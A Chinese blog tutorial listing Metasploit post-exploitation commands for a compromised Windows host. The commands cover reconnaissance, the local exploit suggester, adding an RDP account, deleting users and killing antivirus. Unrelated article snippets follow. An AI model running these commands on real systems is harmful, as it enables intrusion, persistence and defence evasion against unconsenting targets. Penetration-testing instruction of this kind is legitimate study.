Metasploit -- 后渗透模块(POST)

简介: Metasploit -- 后渗透模块(POST)

作用:获取目标主机后shell后,继续信息收集,提权


1、获取目标分区情况


run post/windows/gather/forensics/enum_drives


0a2653c851af460fa595bd959398a8f1.png


2、检测是否是虚拟主机


run post/windows/gather/checkvm


0eacb84100b54626af849e6b562bf92a.png


3、获取当前安装的应用程序


run post/windows/gather/enum_applications


2d65d23f6d4748949b924e4057485923.png


4、获取用户登录信息


run post/windows/gather/enum_logged_on_users


2e9b90b2ca334476abebe75bafe6eeaa.png


5、对目标进行漏洞扫描


run post/multi/recon/local_exploit_suggester


4cebaac233b3433da32a72337a77fc60.png


6、收集系统环境信息


run post/multi/gather/env


6de278e6d6694ce5bb08e7e842b7e74b.png


7、查看开启的服务


run post/windows/gather/enum_services


7a399525ddec4b77923c464820b33738 (1).png


8、查看目标主机最近的操作


run post/windows/gather/dumplinks


7a399525ddec4b77923c464820b33738.png


9、其他操作


删除用户


run post/wndows/manage/delete_user username=aiyou


添加账户


run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou


关闭杀软


windows/manage/killav


禁止非法,后果自负


相关文章
|
前端开发 JavaScript
前端必看的8个HTML+CSS技巧 (八)瀑布流布局
前端必看的8个HTML+CSS技巧 (八)瀑布流布局
233 0
|
SQL Java 关系型数据库
JDBC Connection详解:连接到数据库的关键
在Java中,要与数据库进行交互,需要使用Java数据库连接(JDBC)。JDBC允许您连接到不同类型的数据库,并执行SQL查询、插入、更新和删除操作。在JDBC中,连接数据库是一个重要的步骤,而Connection对象是实现这一目标的关键。本篇博客将详细解释Connection对象的作用、创建和使用方法,以及与数据库连接相关的注意事项。
676 0
|
存储 人工智能 搜索推荐
详解MySQL字符集和Collation
MySQL支持了很多Charset与Collation,并且允许用户在连接、Server、库、表、列、字面量多个层次上进行精细化配置,这有时会让用户眼花缭乱。本文对相关概念、语法、系统变量、影响范围都进行了详细介绍,并且列举了有可能让字符串发生字符集转换的情况,以及来自不同字符集的字符串进行比较等操作时遵循的规则。对于最常用的基于Unicode的字符集,本文介绍了Unicode标准与MySQL中各个字符集的关系,尤其详细介绍了当前版本(8.0.34)默认字符集utf8mb4。
|
自然语言处理 算法 索引
Elasticsearch 8.X 分词插件版本更新不及时解决方案
Elasticsearch 8.X 分词插件版本更新不及时解决方案
|
9月前
|
存储 NoSQL Java
Jedis客户端介绍
【10月更文挑战第12天】
|
11月前
|
自然语言处理
【NLP】如何实现快速加载gensim word2vec的预训练的词向量模型
本文探讨了如何提高使用gensim库加载word2vec预训练词向量模型的效率,提出了三种解决方案:保存模型以便快速重新加载、仅保存和加载所需词向量、以及使用Embedding工具库代替word2vec原训练权重。
604 2
|
机器学习/深度学习 人工智能 数据挖掘
Numba是一个Python库,用于对Python代码进行即时(JIT)编译,以便在硬件上高效执行。
Numba是一个Python库,用于对Python代码进行即时(JIT)编译,以便在硬件上高效执行。
|
安全 Linux API
一篇文章讲明白Metasploit详解详细图文教程
一篇文章讲明白Metasploit详解详细图文教程
787 0
|
机器学习/深度学习 数据可视化 Swift
Florence-2,小模型推进视觉任务的统一表征
Florence-2是一种新颖的视觉基础模型,具有统一的、基于提示的表示,可用于各种计算机视觉和视觉语言任务。
|
安全 网络协议 算法
电脑病毒木马的清除和防范方法
电脑病毒木马的清除和防范方法
2064 0
电脑病毒木马的清除和防范方法
登录插画

登录以查看您的控制台资源

管理云资源
状态一览
快捷访问